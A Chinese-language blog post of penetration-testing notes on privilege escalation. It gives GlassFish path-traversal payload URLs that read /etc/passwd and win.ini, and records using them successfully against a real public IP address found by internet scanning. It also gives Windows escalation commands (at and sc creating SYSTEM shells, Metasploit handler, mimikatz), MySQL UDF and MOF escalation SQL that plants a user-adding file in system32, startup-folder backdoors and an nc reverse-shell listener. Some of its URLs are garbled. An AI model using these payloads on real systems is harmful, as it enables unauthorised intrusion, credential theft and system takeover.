标签：ae 数据库 c0% 提权 ae% 权限

网站权限后台漏洞地第三方获取

　　​​

当前知识点在渗透测试中的点

前期-中期-后期对应的知识点

当前知识点在权限中的重点

知识点顺序，理解思路，分类思路

当前知识点权限提升权限介绍

注重理解当前权限可以操作的事情

利用成功后做的事需要总结得思路

相关的操作被拒绝，无法实现的时候，就会涉及到权限提升。

具体那些权限需要我们知道和了解掌握的？

后台权限（获得方式：爆破，SQL注入猜解，弱口令）：
	一般网站或者应用后台只能操作应用的界面内容数据，图片等叫做后台权限
	无法操作程序的源代码或者服务器上的资源文件。（如果后台存在功能文件操作的话，可以操作文件数据也可以--文件操作管理器--）

网站权限（后台，漏洞，第三方）：
	查看和修改（是否限制了管理员用户）程序源代码，可以进行网站或者应用的配置文件读取（接口配置信息，数据库配置信息），为后续收集服务器操作系统相关的的信息，为后续提权做准备。

数据库权限：
	只能操作数据库用户，数据库的增删改。源码或者配置文件泄露，也可能是网站权限进行的数据库配置文件读取获得。

接口权限：
	短信支付等接口，邮件接口，第三方登录接口。
	修改网站支付接口，改为自己。邮件，短信接口。
	后台权限，网站权限后的获取途径：后台（修改配置信息），网站权限（查看配置文件信息）

系统权限：



域控权限：

　　‍

GlassFish中间件 任意文件读取漏洞

　　​Port : 4848​

漏洞原理

　　glassfish 是一款 java 编写的跨平台的开源的应用服务器。

　　java语言中会把 %c0%ae​解析为 \uC0AE​，最后转义为ASCCII字符的.​（点）。利用 %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/​来向上跳转，达到目录穿越、任意文件读取的效果。所以 glassfish 这个 poc 实际上就是../../../../../../../../../../../etc/passwd​。

　　影响版本：

　　< 4.1.1（不含 4.1.1）

漏洞复现

　　如下测试环境借助 vulhub 的 docker 镜像，附上 P 师傅的链接：https://github.com/vulhub/vulhub

　　编译、运行测试环境，本环境超级管理员密码在 docker-compose.yml​中设置，默认为 vulhub_default_password​，在4848端口利用该密码可以登录管理员账户。

docker-compose up -d

　　环境运行后，访问 http://your-ip:8080​和 http://your-ip:4848​即可查看 web 页面。其中，8080 端口是网站内容，4848 端口是 GlassFish 管理中心。

　　无需登录，直接访问 https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd​

　　linux_poc:

/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

　　window_poc:

/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini

漏洞实战

　　通过fofa​扫描，寻找符合条件的网站进行测试：

　　199.188.222.173:4848

　　​​

　　访问网站如图所示：

　　​​

　　通过输入linux_poc进行测试

　　199.188.222.173:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

　　如图所示，成功获取到/etc/passwd​

　　​​

　　‍

　　‍

　　‍

Win溢出漏洞及AT&SC&PS提权

　　​​

　　‍

　　系统权限

　　​​

　　 常用系统命令

　　​​

　　‍

　　‍

　　‍

案例1:如何判断使用哪种溢出漏洞?漏洞那里找?

　　信息收集-补丁筛选-利用MSF或特定EXP-执行-西瓜到手
vulmap, wes, windowsvulnscan对比,exp在那里获取?

　　Vulmap(使用环境为poweshell,对web提权不友好),Wes(主要用于web提权),

　　WindowsVulnScan(也是POSWESHELL脚本,也可以将目标systeminfo信息按照他的格式写入KB.json文件中,这样就可以用到WEB环境)对比,exp在哪获取?(可以在github或者百度上搜索)

　　.ps1格式文件，只能在powellshell上运行。在web上面执行不了
优先选择MSF工具，若没有选择其他

　　MSF反弹到内网主机，做端口映射。（一般公网反弹）
​use exploit/multi/handler​
先在网站运行exe，然后得到IIS网站权限，再进行提权操作，使用payload，然后再开启一个端口进行监听。

案例2:如何判断使用哪种数据库提权?数据库提权利用条件?MSF结合云服务器搭建组合拳?模拟上述操作实战演练?

　　搭建: https://www.cnblogs.com/M0rta1s/p/11920903.html

案例3:如何判断本地环境可利用漏洞情况?AT&Sc&Ps命令适用环境?

　　vulmap, wes， windowsvulnscan针对漏洞面，其他方法不同层面?
cVE-2020-0787 BitsArbitraryFileMoveExploit

　　将本地权限提升为系统权限，从而执行后续操作

　　CVE-2020-0708 BitsArbitraryFileMoveExploit

　　at 15:13 /interactive cmd.exe

　　可以作用于win7之前的系统

　　sc Create syscmd binPath="cmd /k start" typr= own type interact

　　sc start syscmd

　　(据说能针对win7或者win8,有待考究

　　mimikatz：1.测试域控权限 2.导出所有用户口令 3.维持域控权限

　　涉及的部分资源：

https://github.com/vulmon/Vulmap
https://github.com/bitsadmin/wesng
https://github.com/unamer/CVE-2018-8120
https://github.com/chroblert/windowsVulnScan
https://ithub.com/SecWiki/windows-kernel-exploits
https//www.cnblogs.com/M0rta1s/p/11920903.html
hTps/docs.microsoft.comzh-cn/sysinternals/downloads/pstools
https:/githubcom/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-
VERSION/releases/tag1

MY&MS&ORA 等 SQL 数据库提权

　　​​

　　‍

　　‍

数据库提权

　　​​

案例:MYSQL数据库提权演示-脚本&MSF

流程:服务探针-信息收集-提权利用-获取权限

1.UDF提权知识点:(基于MYSQL调用命令执行函数)

　　读取网站数据库配置文件(了解其命名规则及查找技巧)

　　sql data inc config conn database common include等

　　读取数据库存储或备份文件(了解其数据库存储格式及对应内容)

　　mysql数据库的密码存储在mysql数据库中

　　​​

　　如果想要获取这个文件,我们可以下载该文件,在.MYD文件中寻找

　　mysql中的data文件夹中的mysql文件夹的user.MYD

　　 @@basedir/data/数据库名/表名.myd

　　利用脚本暴力猜解(了解数据库是否支持外联及如何开启外联)

　　工具爆破(root默认不支持web连接)所以可能无法爆破。脚本爆破,将脚本上传到后⻔上去,这属于本地连接本地。而工具属于电脑连接客户端16远程本地暴力猜解,服务器本地暴力猜解

　　‍

　　利用自定义执行函数导出dll文件进行命令执行

　　注：这种dll文件通常编写了一些命令调用的函数内容，然后声明一个函数来调用dll文件来达到命令执行！

手工创建plugin目录或利用NTFS流创建
select 'x' into dumpfile '目录/lib/plugin : :INDEX_ALLOCATION';
1.mysql<5.1 导出目录    c:/windows或system32
2.mysql=>5.1导出 安装目录 /lib/plugin/     (这个目录默认是没有的,需要我们去创建)

　　判断mysql版本后，点击mysql提权,将dll安装到对应的目录

　　​​

　　完毕后,就可以命令执行了

　　这是另外一个脚本，也是调用dll文件，来达到MySQL数据库提权的效果

　　​​

　　查询mysql版本

select version()

　　​​

　　查询mysql安装目录

 select @@basedir

　　​​

　　‍

　　‍

2.MOF知识点:(基于MYsQz特性的安全问题)

　　mof提权的原理:

m​of是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。​

　　详细看这篇文章：https://www.cnblogs.com/xishaonian/p/6384535.html

　　根据文章，自己编写一个user_add.mof文件，导出自定义mof文件到系统目录加载

select load_file ('c:/phpstudy/PHPTutorial/www/user_add.mof') into outfile 'c:/windows/system32/wbem/mof/nullevt.mof' ;

　　成功率不高，难以替换这个文件，大概是没有权限去替换！

3.启动项知识点:(基于配合操作系统自启动)

导出自定义可执行文件到启动目录配合重启执行
将创建好的后门或执行文件进行服务器启动项写入，配合重启执行!

4.反弹知识点:(基于利用反弹特性命令执行)

nc -l -p 5577

WEB后门上执行反弹函数，反弹云服务器上的IP及端口，云服务器上监听5577端口

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

标签：ae,数据库,c0%,提权,ae%,权限
From： https://www.cnblogs.com/itchen-2002/p/18045270/mix-2bwgby